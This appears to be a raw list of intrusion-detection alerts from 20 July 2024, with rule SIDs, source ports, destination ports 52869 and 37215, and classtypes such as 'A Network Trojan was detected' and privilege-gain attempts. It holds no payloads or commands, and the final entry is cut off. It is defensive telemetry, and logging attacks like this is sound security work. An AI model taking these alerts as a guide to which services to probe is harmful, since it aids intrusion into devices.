                      Timestamp:07/20/24-23:06:14.583817
                      SID:2027339
                      Source Port:52868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953817
                      SID:2835222
                      Source Port:39280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.369730
                      SID:2831300
                      Source Port:48330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.593936
                      SID:2027339
                      Source Port:58012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.594036
                      SID:2027339
                      Source Port:34540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:53444
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.662485
                      SID:2835222
                      Source Port:33442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.795331
                      SID:2027339
                      Source Port:45754
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.132087
                      SID:2025132
                      Source Port:53904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2027339
                      Source Port:35826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.963776
                      SID:2831300
                      Source Port:33232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.359662
                      SID:2835222
                      Source Port:58104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.581424
                      SID:2025132
                      Source Port:35398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:45536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2835222
                      Source Port:40320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.083085
                      SID:2829579
                      Source Port:40636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.582471
                      SID:2027339
                      Source Port:53726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.701210
                      SID:2025132
                      Source Port:45650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.893558
                      SID:2027339
                      Source Port:59628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2025132
                      Source Port:56008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2025132
                      Source Port:49158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.407220
                      SID:2027339
                      Source Port:33068
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.080968
                      SID:2027339
                      Source Port:51134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.699362
                      SID:2025132
                      Source Port:60110
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.736604
                      SID:2025132
                      Source Port:48500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.181584
                      SID:2027339
                      Source Port:42458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2027339
                      Source Port:44672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2835222
                      Source Port:51496
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.981585
                      SID:2831300
                      Source Port:60908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.472912
                      SID:2027339
                      Source Port:48798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.982926
                      SID:2027339
                      Source Port:35896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2027339
                      Source Port:51304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.879269
                      SID:2027339
                      Source Port:50884
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.128631
                      SID:2831300
                      Source Port:52094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.676865
                      SID:2027339
                      Source Port:33062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:25.391346
                      SID:2025132
                      Source Port:35332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.544809
                      SID:2025132
                      Source Port:36902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.758912
                      SID:2027339
                      Source Port:57296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.560235
                      SID:2831300
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.727364
                      SID:2025132
                      Source Port:56484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.200523
                      SID:2025132
                      Source Port:43010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.954677
                      SID:2027339
                      Source Port:36180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.404229
                      SID:2027339
                      Source Port:39340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.345104
                      SID:2027339
                      Source Port:38696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.635775
                      SID:2025132
                      Source Port:34116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.260147
                      SID:2027339
                      Source Port:50864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.434236
                      SID:2025132
                      Source Port:34740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.791970
                      SID:2025132
                      Source Port:35084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.619304
                      SID:2025132
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2025132
                      Source Port:48668
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327823
                      SID:2829579
                      Source Port:53580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:55950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2829579
                      Source Port:58036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.539924
                      SID:2835222
                      Source Port:51024
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.492873
                      SID:2027339
                      Source Port:50612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.601961
                      SID:2831300
                      Source Port:40206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.426258
                      SID:2025132
                      Source Port:54698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.996824
                      SID:2835222
                      Source Port:60152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.351281
                      SID:2027339
                      Source Port:60106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.833146
                      SID:2027339
                      Source Port:43062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2835222
                      Source Port:45274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2027339
                      Source Port:53188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2027339
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.557507
                      SID:2027339
                      Source Port:50146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323670
                      SID:2835222
                      Source Port:36390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2027339
                      Source Port:40092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:56054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220682
                      SID:2829579
                      Source Port:57520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.709518
                      SID:2027339
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:55070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.701555
                      SID:2027339
                      Source Port:43960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.587454
                      SID:2025132
                      Source Port:59998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.472911
                      SID:2027339
                      Source Port:45890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.429850
                      SID:2027339
                      Source Port:52880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.208973
                      SID:2027339
                      Source Port:41300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.465127
                      SID:2027339
                      Source Port:43582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.458812
                      SID:2831300
                      Source Port:57528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2829579
                      Source Port:49256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.070304
                      SID:2831300
                      Source Port:48160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:58.157771
                      SID:2831300
                      Source Port:41988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.345878
                      SID:2027339
                      Source Port:60774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.770520
                      SID:2025132
                      Source Port:39322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2027339
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2829579
                      Source Port:37790
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.899491
                      SID:2025132
                      Source Port:53778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.351053
                      SID:2025132
                      Source Port:34834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2027339
                      Source Port:33164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.598734
                      SID:2835222
                      Source Port:42370
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2831300
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.465756
                      SID:2027339
                      Source Port:33730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.285994
                      SID:2829579
                      Source Port:38978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2025132
                      Source Port:33180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.399812
                      SID:2027339
                      Source Port:55694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.788274
                      SID:2829579
                      Source Port:36280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164212
                      SID:2027339
                      Source Port:48654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.553063
                      SID:2027339
                      Source Port:58570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.874908
                      SID:2025132
                      Source Port:33830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.850879
                      SID:2027339
                      Source Port:54616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.287042
                      SID:2025132
                      Source Port:60154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2027339
                      Source Port:44716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:46176
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.513067
                      SID:2831300
                      Source Port:34586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.355569
                      SID:2027339
                      Source Port:44490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2831300
                      Source Port:50604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2835222
                      Source Port:53880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.449068
                      SID:2027339
                      Source Port:55320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.318185
                      SID:2831300
                      Source Port:42732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.397411
                      SID:2027339
                      Source Port:50404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2027339
                      Source Port:47904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.916130
                      SID:2027339
                      Source Port:41310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.327822
                      SID:2835222
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.098635
                      SID:2027339
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.395456
                      SID:2027339
                      Source Port:51154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:49104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:50660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.453690
                      SID:2027339
                      Source Port:51928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.394049
                      SID:2027339
                      Source Port:42816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.292975
                      SID:2831300
                      Source Port:34468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.712041
                      SID:2027339
                      Source Port:54716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857328
                      SID:2829579
                      Source Port:55046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:25.723282
                      SID:2027339
                      Source Port:36546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.735165
                      SID:2027339
                      Source Port:55364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.594252
                      SID:2027339
                      Source Port:53870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.250934
                      SID:2025132
                      Source Port:37214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.729623
                      SID:2025132
                      Source Port:54146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.894939
                      SID:2025132
                      Source Port:55704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:56582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.063003
                      SID:2025132
                      Source Port:37240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.574960
                      SID:2829579
                      Source Port:53752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.029235
                      SID:2027339
                      Source Port:51446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.180899
                      SID:2835222
                      Source Port:56228
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.953643
                      SID:2835222
                      Source Port:51470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.463271
                      SID:2025132
                      Source Port:42232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.508612
                      SID:2025132
                      Source Port:58034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.338954
                      SID:2027339
                      Source Port:49646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.402808
                      SID:2027339
                      Source Port:55530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.374852
                      SID:2025132
                      Source Port:58538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.626588
                      SID:2829579
                      Source Port:36134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2835222
                      Source Port:42476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.780457
                      SID:2025132
                      Source Port:51776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.419849
                      SID:2829579
                      Source Port:49168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.649487
                      SID:2025132
                      Source Port:51276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.194696
                      SID:2025132
                      Source Port:42488
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.669261
                      SID:2027339
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.409134
                      SID:2829579
                      Source Port:36190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.825155
                      SID:2025132
                      Source Port:46698
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:16.285196
                      SID:2831300
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.844262
                      SID:2025132
                      Source Port:33224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2027339
                      Source Port:39904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348099
                      SID:2027339
                      Source Port:47582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.023969
                      SID:2027339
                      Source Port:34090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.444875
                      SID:2027339
                      Source Port:39334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.048573
                      SID:2835222
                      Source Port:60912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.060021
                      SID:2835222
                      Source Port:33164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.947146
                      SID:2027339
                      Source Port:60902
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.099234
                      SID:2027339
                      Source Port:37176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.985424
                      SID:2025132
                      Source Port:40672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.370742
                      SID:2831300
                      Source Port:32854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.467316
                      SID:2027339
                      Source Port:40776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.456849
                      SID:2027339
                      Source Port:49512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.456840
                      SID:2027339
                      Source Port:33976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.323671
                      SID:2025132
                      Source Port:60792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2829579
                      Source Port:49190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.828184
                      SID:2027339
                      Source Port:39990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.171459
                      SID:2025132
                      Source Port:43504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.296188
                      SID:2027339
                      Source Port:59228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.489810
                      SID:2027339
                      Source Port:47092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:42402
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:33102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.632253
                      SID:2027339
                      Source Port:49838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2829579
                      Source Port:53364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.253781
                      SID:2027339
                      Source Port:51558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.084045
                      SID:2027339
                      Source Port:43120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.765315
                      SID:2027339
                      Source Port:41026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.135703
                      SID:2829579
                      Source Port:53132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.123567
                      SID:2025132
                      Source Port:42616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.502937
                      SID:2025132
                      Source Port:56304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.180750
                      SID:2027339
                      Source Port:48004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.450149
                      SID:2831300
                      Source Port:36120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.775023
                      SID:2835222
                      Source Port:51224
                      Destination Port:37215
                      Protocol:TCP
